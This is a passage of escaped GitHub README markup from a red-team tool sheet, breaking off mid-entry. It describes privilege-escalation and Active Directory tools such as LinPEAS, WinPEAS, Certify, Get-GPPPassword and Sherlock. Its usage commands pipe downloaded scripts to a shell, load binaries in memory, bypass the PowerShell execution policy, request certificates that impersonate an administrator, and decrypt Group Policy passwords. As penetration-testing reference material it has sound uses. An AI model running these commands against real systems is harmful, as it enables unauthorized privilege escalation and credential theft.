src=\"https://private-user-images.githubusercontent.com/100603074/423172646-0194b7bf-80ee-44cd-a576-22bc6888de8a.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvNDIzMTcyNjQ2LTAxOTRiN2JmLTgwZWUtNDRjZC1hNTc2LTIyYmM2ODg4ZGU4YS5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT0zNmY2NWE5NDFkZWFmMzE3MDZkZGRkNmQxYWIyMGM1NjdlNmNjNGY2Mzc2YmFiNjA5ZTExNWNhYzg2ZWIwZDUzJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.EGDAx0wtQmsqUle54CyBQwSVcGBTbhxv7hMvVTuuR14\" alt=\"Crassus\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://github.com/vu-ls/Crassus?tab=readme-ov-file#screenshots\"\u003ehttps://github.com/vu-ls/Crassus?tab=readme-ov-file#screenshots\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS\"\u003eLinPEAS\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-linpeas\" class=\"anchor\" aria-label=\"Permalink: 🔙LinPEAS\" href=\"#linpeas\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 
1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eLinPEAS is a nice, verbose privilege escalation script for finding local privesc routes on Linux endpoints.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall + Usage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"curl -L \u0026quot;https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh\u0026quot; | sh\"\u003e\u003cpre\u003ecurl -L \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003ehttps://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003c/span\u003e \u003cspan class=\"pl-k\"\u003e|\u003c/span\u003e sh\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/192070104-8a121544-5c88-4c24-8b2e-590700b345e7.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/192070104-8a121544-5c88-4c24-8b2e-590700b345e7.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS\"\u003eWinPEAS\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-winpeas\" class=\"anchor\" aria-label=\"Permalink: 🔙WinPEAS\" href=\"#winpeas\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" 
height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eWinPEAS is a nice verbose privilege escalation for finding local privesc routes on Windows endpoints.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall + Usage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"$wp=[System.Reflection.Assembly]::Load([byte[]](Invoke-WebRequest \u0026quot;https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASany_ofs.exe\u0026quot; -UseBasicParsing | Select-Object -ExpandProperty Content)); [winPEAS.Program]::Main(\u0026quot;\u0026quot;)\"\u003e\u003cpre\u003e\u003cspan class=\"pl-smi\"\u003e$wp\u003c/span\u003e=[System.Reflection.Assembly]::Load([byte[]](Invoke-WebRequest \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003ehttps://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASany_ofs.exe\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003c/span\u003e -UseBasicParsing \u003cspan class=\"pl-k\"\u003e|\u003c/span\u003e Select-Object -ExpandProperty Content))\u003cspan class=\"pl-k\"\u003e;\u003c/span\u003e [winPEAS.Program]::Main(\u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003cspan 
class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003c/span\u003e)\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/192070193-fed8a0e8-b82a-4338-9209-6352f33ab6b8.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/192070193-fed8a0e8-b82a-4338-9209-6352f33ab6b8.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/diego-treitos/linux-smart-enumeration\"\u003elinux-smart-enumeration\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-linux-smart-enumeration\" class=\"anchor\" aria-label=\"Permalink: 🔙linux-smart-enumeration\" href=\"#linux-smart-enumeration\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eLinux smart enumeration is another good, less verbose, linux privesc tool for Linux.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall + Usage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate 
position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"curl \u0026quot;https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh\u0026quot; -Lo lse.sh;chmod 700 lse.sh\"\u003e\u003cpre\u003ecurl \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003ehttps://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003c/span\u003e -Lo lse.sh\u003cspan class=\"pl-k\"\u003e;\u003c/span\u003echmod 700 lse.sh\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/192070258-2fe8727a-4b75-430d-a84e-da6605750de9.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/192070258-2fe8727a-4b75-430d-a84e-da6605750de9.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/GhostPack/Certify\"\u003eCertify\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-certify\" class=\"anchor\" aria-label=\"Permalink: 🔙Certify\" href=\"#certify\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 
1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eCertify is a C# tool to enumerate and abuse misconfigurations in Active Directory Certificate Services (AD CS).\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eCertify is designed to be used in conjunction with other red team tools and techniques, such as Mimikatz and PowerShell. The misconfigurations it finds typically let a low-privileged requester obtain a certificate for a different principal (see the \u003ccode\u003e/altname\u003c/code\u003e example under Usage); that certificate can then be used to authenticate as the other principal, which is what turns the finding into impersonation and privilege escalation.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eKey features of Certify:\u003c/strong\u003e\u003c/p\u003e\n\u003cul dir=\"auto\"\u003e\n\u003cli\u003eEnumerating certificate authorities and certificate templates, and flagging templates with exploitable settings (\u003ccode\u003efind /vulnerable\u003c/code\u003e)\u003c/li\u003e\n\u003cli\u003eRequesting a certificate from a given CA and template, optionally with an alternate subject name (\u003ccode\u003erequest ... /altname:\u003c/code\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Compile)\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eCertify is compatible with \u003ca href=\"https://visualstudio.microsoft.com/vs/community/\" rel=\"nofollow\"\u003eVisual Studio 2019 Community Edition\u003c/a\u003e. 
Open the Certify project \u003ca href=\"https://github.com/GhostPack/Certify\"\u003e.sln\u003c/a\u003e, choose \"Release\", and build.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Running Certify Through PowerShell)\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eIf you want to run Certify in-memory through a PowerShell wrapper, first compile the Certify and base64-encode the resulting assembly:\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"[Convert]::ToBase64String([IO.File]::ReadAllBytes(\u0026quot;C:\\Temp\\Certify.exe\u0026quot;)) | Out-File -Encoding ASCII C:\\Temp\\Certify.txt\"\u003e\u003cpre\u003e[Convert]::ToBase64String([IO.File]::ReadAllBytes(\u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003eC:\\Temp\\Certify.exe\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003c/span\u003e)) \u003cspan class=\"pl-k\"\u003e|\u003c/span\u003e Out-File -Encoding ASCII C:\u003cspan class=\"pl-cce\"\u003e\\T\u003c/span\u003eemp\u003cspan class=\"pl-cce\"\u003e\\C\u003c/span\u003eertify.txt\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eCertify can then be loaded in a PowerShell script with the following (where \"aa...\" is replaced with the base64-encoded Certify assembly string):\u003c/p\u003e\n\u003cdiv class=\"snippet-clipboard-content notranslate position-relative overflow-auto\" data-snippet-clipboard-copy-content=\"$CertifyAssembly = [System.Reflection.Assembly]::Load([Convert]::FromBase64String(\u0026quot;aa...\u0026quot;))\"\u003e\u003cpre class=\"notranslate\"\u003e\u003ccode\u003e$CertifyAssembly = [System.Reflection.Assembly]::Load([Convert]::FromBase64String(\"aa...\"))\n\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eThe Main() method and any arguments can then be invoked as follows:\u003c/p\u003e\n\u003cdiv 
class=\"snippet-clipboard-content notranslate position-relative overflow-auto\" data-snippet-clipboard-copy-content=\"[Certify.Program]::Main(\u0026quot;find /vulnerable\u0026quot;.Split())\"\u003e\u003cpre class=\"notranslate\"\u003e\u003ccode\u003e[Certify.Program]::Main(\"find /vulnerable\".Split())\n\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eFull compile instructions can be found \u003ca href=\"https://github.com/GhostPack/Certify#compile-instructions\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# See if there are any vulnerable templates\nCertify.exe find /vulnerable\n\n# Request a new certificate for a template/CA, specifying a DA localadmin as the alternate principal\nCertify.exe request /ca:dc.theshire.local\\theshire-DC-CA /template:VulnTemplate /altname:localadmin\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e See if there are any vulnerable templates\u003c/span\u003e\nCertify.exe find /vulnerable\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Request a new certificate for a template/CA, specifying a DA localadmin as the alternate principal\u003c/span\u003e\nCertify.exe request /ca:dc.theshire.local\u003cspan class=\"pl-cce\"\u003e\\t\u003c/span\u003eheshire-DC-CA /template:VulnTemplate /altname:localadmin\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eFull example walkthrough can be found \u003ca href=\"https://github.com/GhostPack/Certify#example-walkthrough\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" 
href=\"https://user-images.githubusercontent.com/100603074/210088651-28899ba5-cbbd-4b03-8000-068fd401476d.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/210088651-28899ba5-cbbd-4b03-8000-068fd401476d.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-GPPPassword.ps1\"\u003eGet-GPPPassword\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-get-gpppassword\" class=\"anchor\" aria-label=\"Permalink: 🔙Get-GPPPassword\" href=\"#get-gpppassword\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eGet-GPPPassword is a PowerShell script part of the PowerSploit toolkit, it is designed to retrieve passwords for local accounts that are created and managed using Group Policy Preferences (GPP).\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eGet-GPPPassword works by searching the SYSVOL folder on the domain controller for any GPP files that contain password information. 
Once it finds these files, it decrypts the \u003ccode\u003ecpassword\u003c/code\u003e values and displays them to the user. Decryption is possible because the AES key that Group Policy Preferences used for these values was published by Microsoft; the MS14-025 fix stops new passwords from being written into GPP but does not remove preference files that already exist in SYSVOL, so this check is still worth running on a patched domain. SYSVOL is readable by any authenticated domain user, so no elevated privileges are needed.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eFollow the PowerSploit \u003ca href=\"https://github.com/A-poc/RedTeam-Tools#powersploit\"\u003einstallation instructions\u003c/a\u003e from this tool sheet.\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"powershell.exe -ep bypass\nImport-Module PowerSploit\"\u003e\u003cpre\u003epowershell.exe -ep bypass\nImport-Module PowerSploit\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Get all passwords with additional information\nGet-GPPPassword\n\n# Get list of all passwords\nGet-GPPPassword | ForEach-Object {$_.passwords} | Sort-Object -Uniq\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Get all passwords with additional information\u003c/span\u003e\nGet-GPPPassword\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Get list of all passwords\u003c/span\u003e\nGet-GPPPassword \u003cspan class=\"pl-k\"\u003e|\u003c/span\u003e ForEach-Object {\u003cspan class=\"pl-smi\"\u003e$_\u003c/span\u003e.passwords} \u003cspan class=\"pl-k\"\u003e|\u003c/span\u003e Sort-Object -Uniq\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/210089230-6a61579b-849d-4175-96ec-6ea75e001038.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/210089230-6a61579b-849d-4175-96ec-6ea75e001038.png\" alt=\"image\" 
style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/rasta-mouse/Sherlock\"\u003eSherlock\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-sherlock\" class=\"anchor\" aria-label=\"Permalink: 🔙Sherlock\" href=\"#sherlock\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003ePowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eSupports:\u003c/em\u003e\u003c/p\u003e\n\u003cul dir=\"auto\"\u003e\n\u003cli\u003eMS10-015 : User Mode to Ring (KiTrap0D)\u003c/li\u003e\n\u003cli\u003eMS10-092 : Task Scheduler\u003c/li\u003e\n\u003cli\u003eMS13-053 : NTUserMessageCall Win32k Kernel Pool Overflow\u003c/li\u003e\n\u003cli\u003eMS13-081 : TrackPopupMenuEx Win32k NULL Page\u003c/li\u003e\n\u003cli\u003eMS14-058 : TrackPopupMenu Win32k Null Pointer Dereference\u003c/li\u003e\n\u003cli\u003eMS15-051 : ClientCopyImage Win32k\u003c/li\u003e\n\u003cli\u003eMS15-078 : Font Driver Buffer Overflow\u003c/li\u003e\n\u003cli\u003eMS16-016 : 'mrxdav.sys' 
WebDAV\u003c/li\u003e\n\u003cli\u003eMS16-032 : Secondary Logon Handle\u003c/li\u003e\n\u003cli\u003eMS16-034 : Windows Kernel-Mode Drivers EoP\u003c/li\u003e\n\u003cli\u003eMS16-135 : Win32k Elevation of Privilege\u003c/li\u003e\n\u003cli\u003eCVE-2017-7199 : Nessus Agent 6.6.2 - 6.10.3 Priv Esc\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (PowerShell)\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Git install\ngit clone https://github.com/rasta-mouse/Sherlock\n\n# Load powershell module\nImport-Module -Name C:\\INSTALL_LOCATION\\Sherlock\\Sherlock.ps1\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Git install\u003c/span\u003e\ngit clone https://github.com/rasta-mouse/Sherlock\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Load powershell module\u003c/span\u003e\nImport-Module -Name C:\u003cspan class=\"pl-cce\"\u003e\\I\u003c/span\u003eNSTALL_LOCATION\u003cspan class=\"pl-cce\"\u003e\\S\u003c/span\u003eherlock\u003cspan class=\"pl-cce\"\u003e\\S\u003c/span\u003eherlock.ps1\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage: (PowerShell)\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Run all functions\nFind-AllVulns\n\n# Run specific function (MS14-058 : TrackPopupMenu Win32k Null Pointer Dereference)\nFind-MS14058\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Run all functions\u003c/span\u003e\nFind-AllVulns\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Run specific function (MS14-058 : TrackPopupMenu Win32k Null Pointer 
Dereference)\u003c/span\u003e\nFind-MS14058\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/210182250-b5e9a4c1-4d30-4591-b06b-7d58098c7fef.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/210182250-b5e9a4c1-4d30-4591-b06b-7d58098c7fef.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://vk9-sec.com/sherlock-find-missing-windows-patches-for-local-privilege-escalation/\" rel=\"nofollow\"\u003ehttps://vk9-sec.com/sherlock-find-missing-windows-patches-for-local-privilege-escalation/\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/rasta-mouse/Watson\"\u003eWatson\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-watson\" class=\"anchor\" aria-label=\"Permalink: 🔙Watson\" href=\"#watson\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 